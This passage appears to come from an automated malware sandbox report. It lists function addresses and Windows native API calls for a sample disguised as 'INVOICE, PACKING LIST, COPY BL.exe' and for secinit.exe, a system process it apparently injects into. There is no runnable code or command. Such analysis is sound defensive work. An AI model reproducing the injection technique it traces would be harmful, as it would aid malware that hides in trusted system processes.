                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672AF0 NtWriteFile,3_2_01672AF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672AD0 NtReadFile,3_2_01672AD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672AB0 NtWaitForSingleObject,3_2_01672AB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672D30 NtUnmapViewOfSection,3_2_01672D30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672D00 NtSetInformationFile,3_2_01672D00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672D10 NtMapViewOfSection,3_2_01672D10
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672DD0 NtDelayExecution,3_2_01672DD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672DB0 NtEnumerateKey,3_2_01672DB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672C60 NtCreateKey,3_2_01672C60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672C00 NtQueryInformationProcess,3_2_01672C00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672CF0 NtOpenProcess,3_2_01672CF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672CC0 NtQueryVirtualMemory,3_2_01672CC0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672CA0 NtQueryInformationToken,3_2_01672CA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672F60 NtCreateProcessEx,3_2_01672F60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672F30 NtCreateSection,3_2_01672F30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672FE0 NtCreateFile,3_2_01672FE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672FA0 NtQuerySection,3_2_01672FA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672FB0 NtResumeThread,3_2_01672FB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672F90 NtProtectVirtualMemory,3_2_01672F90
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672E30 NtWriteVirtualMemory,3_2_01672E30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672EE0 NtQueueApcThread,3_2_01672EE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672EA0 NtAdjustPrivilegesToken,3_2_01672EA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672E80 NtReadVirtualMemory,3_2_01672E80
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01673010 NtOpenDirectoryObject,3_2_01673010
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01673090 NtSetValueKey,3_2_01673090
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016739B0 NtGetContextThread,3_2_016739B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01673D70 NtOpenThread,3_2_01673D70
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01673D10 NtOpenProcessToken,3_2_01673D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03284340 NtSetContextThread,LdrInitializeThunk,6_2_03284340
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03284650 NtSuspendThread,LdrInitializeThunk,6_2_03284650
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282B60 NtClose,LdrInitializeThunk,6_2_03282B60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03282BA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03282BE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03282BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282AF0 NtWriteFile,LdrInitializeThunk,6_2_03282AF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282AD0 NtReadFile,LdrInitializeThunk,6_2_03282AD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282F30 NtCreateSection,LdrInitializeThunk,6_2_03282F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282FB0 NtResumeThread,LdrInitializeThunk,6_2_03282FB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282FE0 NtCreateFile,LdrInitializeThunk,6_2_03282FE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03282E80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03282EE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03282D30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03282D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03282DF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282DD0 NtDelayExecution,LdrInitializeThunk,6_2_03282DD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282C60 NtCreateKey,LdrInitializeThunk,6_2_03282C60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03282C70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03282CA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032835C0 NtCreateMutant,LdrInitializeThunk,6_2_032835C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032839B0 NtGetContextThread,LdrInitializeThunk,6_2_032839B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282B80 NtQueryInformationFile,6_2_03282B80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282AB0 NtWaitForSingleObject,6_2_03282AB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282F60 NtCreateProcessEx,6_2_03282F60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282FA0 NtQuerySection,6_2_03282FA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282F90 NtProtectVirtualMemory,6_2_03282F90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282E30 NtWriteVirtualMemory,6_2_03282E30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282EA0 NtAdjustPrivilegesToken,6_2_03282EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282D00 NtSetInformationFile,6_2_03282D00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282DB0 NtEnumerateKey,6_2_03282DB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282C00 NtQueryInformationProcess,6_2_03282C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282CF0 NtOpenProcess,6_2_03282CF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03282CC0 NtQueryVirtualMemory,6_2_03282CC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03283010 NtOpenDirectoryObject,6_2_03283010
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03283090 NtSetValueKey,6_2_03283090
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03283D10 NtOpenProcessToken,6_2_03283D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03283D70 NtOpenThread,6_2_03283D70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AE9240 NtCreateFile,6_2_02AE9240
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AE93A0 NtReadFile,6_2_02AE93A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AE9690 NtAllocateVirtualMemory,6_2_02AE9690
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AE9490 NtDeleteFile,6_2_02AE9490
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AE9530 NtClose,6_2_02AE9530
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356F980 NtSetContextThread,6_2_0356F980
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_010FE43C0_2_010FE43C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_02A77ED80_2_02A77ED8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_02A709200_2_02A70920
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_02A709100_2_02A70910
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_02A77EC80_2_02A77EC8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_057691E40_2_057691E4
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_057691DD0_2_057691DD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_057698380_2_05769838
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070595D80_2_070595D8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705B0800_2_0705B080
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07053E050_2_07053E05
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07055E5D0_2_07055E5D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059A180_2_07059A18
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705B9300_2_0705B930
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070549380_2_07054938
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070595CA0_2_070595CA
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070595D50_2_070595D5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705A4000_2_0705A400
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070554990_2_07055499
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070593D00_2_070593D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070593DD0_2_070593DD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070593E00_2_070593E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705A3F00_2_0705A3F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070591580_2_07059158
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070591650_2_07059165
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070591680_2_07059168
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705B0700_2_0705B070
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705BF000_2_0705BF00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705BF100_2_0705BF10
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07058F380_2_07058F38
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07058F450_2_07058F45
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07058F480_2_07058F48
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059FA80_2_07059FA8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059FB50_2_07059FB5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059FB80_2_07059FB8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07055E5A0_2_07055E5A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07057D080_2_07057D08
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059C500_2_07059C50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059C5D0_2_07059C5D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059C600_2_07059C60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07057CF80_2_07057CF8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07057B1D0_2_07057B1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07059A080_2_07059A08
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070549060_2_07054906
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705B9210_2_0705B921
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070588A90_2_070588A9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070548A90_2_070548A9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070588B50_2_070588B5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_0705A8B20_2_0705A8B2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070588B80_2_070588B8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070558E00_2_070558E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_070558ED0_2_070558ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A8F480_2_071A8F48
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A00400_2_071A0040
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A4F400_2_071A4F40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A2F670_2_071A2F67
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A46D00_2_071A46D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A4B080_2_071A4B08
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A33E00_2_071A33E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A4AF80_2_071A4AF8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_071A00060_2_071A0006
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00418B633_2_00418B63
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0042F1F33_2_0042F1F3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00402AE03_2_00402AE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004033C53_2_004033C5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004033D03_2_004033D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004103AA3_2_004103AA
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004103B33_2_004103B3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00416D5E3_2_00416D5E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00416D633_2_00416D63
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040E5C33_2_0040E5C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004105D33_2_004105D3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004025823_2_00402582
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004025903_2_00402590
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00402F403_2_00402F40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040E75C3_2_0040E75C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040276A3_2_0040276A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004027703_2_00402770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040E7123_2_0040E712
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040E7133_2_0040E713
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00402F3D3_2_00402F3D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C81583_2_016C8158
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016301003_2_01630100
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DA1183_2_016DA118
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F81CC3_2_016F81CC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F41A23_2_016F41A2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017001AA3_2_017001AA
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D20003_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FA3523_2_016FA352
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E3F03_2_0164E3F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017003E63_2_017003E6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E02743_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C02C03_2_016C02C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016405353_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017005913_2_01700591
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F24463_2_016F2446
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E44203_2_016E4420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EE4F63_2_016EE4F6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016407703_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016647503_2_01664750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163C7C03_2_0163C7C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165C6E03_2_0165C6E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016569623_2_01656962
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A03_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0170A9A63_2_0170A9A6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164A8403_2_0164A840
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016428403_2_01642840
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E8F03_2_0166E8F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016268B83_2_016268B8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FAB403_2_016FAB40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F6BD73_2_016F6BD7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163EA803_2_0163EA80
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164AD003_2_0164AD00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DCD1F3_2_016DCD1F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163ADE03_2_0163ADE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01658DBF3_2_01658DBF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640C003_2_01640C00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630CF23_2_01630CF2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0CB53_2_016E0CB5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B4F403_2_016B4F40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01682F283_2_01682F28
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01660F303_2_01660F30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E2F303_2_016E2F30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164CFE03_2_0164CFE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01632FC83_2_01632FC8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BEFA03_2_016BEFA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640E593_2_01640E59
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FEE263_2_016FEE26
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FEEDB3_2_016FEEDB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652E903_2_01652E90
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FCE933_2_016FCE93
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167516C3_2_0167516C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162F1723_2_0162F172
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0170B16B3_2_0170B16B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164B1B03_2_0164B1B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F70E93_2_016F70E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FF0E03_2_016FF0E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EF0CC3_2_016EF0CC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016470C03_2_016470C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162D34C3_2_0162D34C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F132D3_2_016F132D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0168739A3_2_0168739A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E12ED3_2_016E12ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165B2C03_2_0165B2C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016452A03_2_016452A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F75713_2_016F7571
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017095C33_2_017095C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DD5B03_2_016DD5B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016314603_2_01631460
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FF43F3_2_016FF43F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FF7B03_2_016FF7B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016856303_2_01685630
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F16CC3_2_016F16CC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016499503_2_01649950
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165B9503_2_0165B950
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D59103_2_016D5910
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AD8003_2_016AD800
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016438E03_2_016438E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFB763_2_016FFB76
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B5BF03_2_016B5BF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167DBF93_2_0167DBF9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165FB803_2_0165FB80
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B3A6C3_2_016B3A6C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFA493_2_016FFA49
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F7A463_2_016F7A46
